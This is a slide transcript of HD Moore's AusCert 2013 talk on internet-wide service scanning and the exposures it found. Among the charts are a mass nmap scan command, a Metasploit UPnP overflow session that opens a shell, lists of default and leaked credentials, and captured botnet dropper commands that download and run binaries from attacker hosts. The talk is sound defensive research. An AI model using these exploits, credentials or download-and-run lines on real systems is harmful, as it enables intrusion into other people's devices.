AusCert 2013: Global Network Security

AusCert 2013: Global Network Security

Video of this presentation can be found at:
https://www.youtube.com/watch?v=ZNlikR11icY

This presentation focused on the results of a 12-month research project that involved scanning the internet at large for a number of common services. The original intent of the project was to identify cases where vendors or ISPs have put large groups of consumers at risk due to negligent practices. These results have been obtained and continue to be collected and analyzed. In addition to the consumer-level issues, quite a few major exposures have been identified during the analysis of the data set. So far, this analysis has helped four other independent research teams quantify their results and resulted in Bloomberg/NYT coverage due to its use in identifying the FinFisher botnet C&C systems (a government-run malware environment). This data is immensely useful for quantifying exposure, identifying new global-scale threats, and creating indicators of future compromise.

4ff143f6a6b7644bba6114d3c52e9513?s=128

HD Moore

May 23, 2013
Tweet

Transcript

  1. None
  2. ► ► ►

  3. ► ► ► ► ►

  4. ► ► ► ► ► ► ► ► ► ►

  5. ► ► ►

  6. ► ► ► ► ► ► # nmap -sS -PS443

    -p443 -n --max-retries=1 -n -M 256 \ --open \ --min-rtt-timeout=1000ms --max-rtt-timeout=1000ms \ --min-hostgroup=50000 --min-rate=50000 \ --max-rate=50000 \ --script=banner-plus.nse \ --excludefile=exclude.txt \ -oG node.gnmap -oX node.xml \ -iR 250000 Code: https://gitub.com/hdm/scan-tools
  7. ► ► ► ► ► ► ► Code: https://gitub.com/hdm/scan-tools

  8. ► ► ► ► ► ► ► ► ► ►

  9. ► ► ► ► ► ►

  10. ► ► ► ► ► ► So what your saying

    is I should just ignore the excessive amount of port snooping coming from your system(s), and I should allow this on your word alone? Since when did you become my big brother? Are you related to Obama? Ironically, since the days you have begun your independent scans we have received a few DDOS attacks using udp_app port 53 traffic.....any correlation? Please identify your customer operating from the above address at the time mentioned, and terminate immediately his hacking activities. Please prevent him from continuing his hacking activities in the future as well. Due to the potential severity of this incident, we have reported it to the Computer Emergency Response Team (CERT) in United States (US) and Denmark. You are welcome to try and hack my network as an academic exercise but even if you are successful you will find nothing of interest, and any attempt to corrupt the O/S can be restored in a few minutes.
  11. ► ► ► ► ► ► ► ► ►

  12. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service
  13. 1900 80 161 137 443 8080 23 21 22 25

    3306 110 143 995 993 5353 5900 17185 Global IPv4 Services 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Australian IPv4 Services
  14. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►
  15. ► ► ► ► ► ►

  16. ► ► ► ► ► ► ► ► ► Intel/Portable

    SDK MiniUPnP Broadcom SDK Others
  17. ► ► ► ► ► ► ► ► ► ►

  18. ► ► ► ► $ msfconsole msf > use exploit/multi/upnp/libupnp_ssdp_overflow

    msf exploit(libupnp_ssdp_overflow) > set RHOST 192.168.122.89 msf exploit(libupnp_ssdp_overflow) > exploit [*] Started reverse double handler [*] Exploiting 192.168.122.89 with target Supermicro Onboard IPMI (X9SCL/X9SCM) [+] Sending payload of 178 bytes to 192.168.122.89:56911... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command shell session 1 opened [*] Shutting down payload stager listener... uname -a Linux debian-armel 2.6.32-5-versatile #1 Wed Jan 12 23:05:11 UTC 2011 armv5tejl
  19. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ► ►
  20. ► ► ► Apache Microsoft NginX Netcraft - January 2013

    RomPager Apache Akamai NginX Microsoft Critical.IO - January 2013
  21. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ►
  22. ► ► ► ► ► ► USA ESP IND TUR

    BRA ITA DEU POL RUS THA VNM CHN PER MYS ARG EGY GBR TWN KOR IDN Devices by Country
  23. ► ► ► ► ► ►

  24. ► ► ► ► ► ► ►

  25. Usernames Passwords admin 12345 root h3capadmin lyzdm xialiang!@# lywlj nhkhwlwhz

    lymr admin lyjy 1234 lyzwm szwx@ah lyys huawei jlllylj itms123456 lygsg AAA888### lyjrw 662 lyyys abc123! lysw zch3capadmin lygmb 123456 lyfyh apadmin huawei password
  26. ► ► ► ► ► username=sa password=Masterkey2011 LicenseCheck=Defne DSN=sms;UID=XXX;PWD=XXXsys; DSN=GeoXXX;UID=XXX;PWD=XXXsys;

    8383 password h4ve@gr8d3y --daemon --port 8020 --socks5 --s_user Windows --s_password System XXXX /ssh /auth=password /user=admin /passwd=admin_p@s$word http://a.b.c/manage/retail_login.php3?ms_id=14320101&passwd=7325 a.b.c.d:3389 --user administrator --pass passw0rd123
  27. ► ► ► ► ► ►

  28. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►
  29. ► ► ► ► HUAWEI QUALCOMM ASUSTEK VMWARE HP DELL

    HYUNDAI MICROSOFT INTEL
  30. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ► ►
  31. ► ► ► ► 27% 15% 10% 7% 5% 29%

    FTP Software ProFTPD PureFTP Microsoft Firmware vsFTPd Mikrotik FileZilla Speedtouch Other 1.3.3g 1.3.1 1.3.3a 1.3.4a 1.3.3e 1.3.2e ProFTPD Versions 1.3.3g 1.3.1 1.3.3a 1.3.4a 1.3.3e 1.3.2e 1.3.3c 1.3.4b 1.3.0 1.3.3d 1.3.2c 1.2.10 1.3.0a 1.2.9 1.3.5rc1 1.3.2
  32. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ► ►
  33. SMTP POP3 IMAP POP3S IMAPS

  34. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►
  35. ► ► ► VNC Protocol Versions RFB 003.008 RFB 003.889

    RFB 003.006 RFB 003.003 RFB 004.001 RFB 004.000 RFB 003.007 RFB 003.004
  36. ► ► ►

  37. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►
  38. ► ► ► ► ► ►

  39. ► ► ► ► 0 1000 2000 3000 4000 5000

    6000 OpenServer AIX Solaris UnixWare IRIX OpenVMS HPUX
  40. ► ►

  41. None
  42. ► ► ► ► ► ► ► ► ►

  43. ► ► ► ► ► ► ► ► ► ►

  44. None
  45. ► ► ► ► $ telnet A.B.C.D Escape character is

    '^]'. sh-3.00# history 1 root 2 admin 3 mkdir /var/run; mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && wget -c http://176.xxx.xxx.xxx/sysV6/sysV6.sh && sh sysV6.sh || mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && ftpget -u skynet -p cloud 176.xxx.xxx.xxx sysV6.sh sysV6/sysV6.sh && sh sysV6.sh &
  46. ► ► # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.

    # UPLOAD GETBINARIES.SH IN YOUR HTTPD. # YOUR HTTPD SERVER: REFERENCE_HTTP="http://173.xxx.xxx.xxx" wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run … wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && … wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && … wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && … wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && … wget -c ${REFERENCE_HTTP}/sshd -P /var/run && … wget -c ${REFERENCE_HTTP}/telnetd -P /var/run && … iptables -A INPUT -p tcp --dport 23 -j DROP mv /usr/bin/wget /usr/bin/wg mv /bin/wget /bin /wg
  47. ► ► ► ► ► ► ► ►

  48. ► ► ► ►

  49. None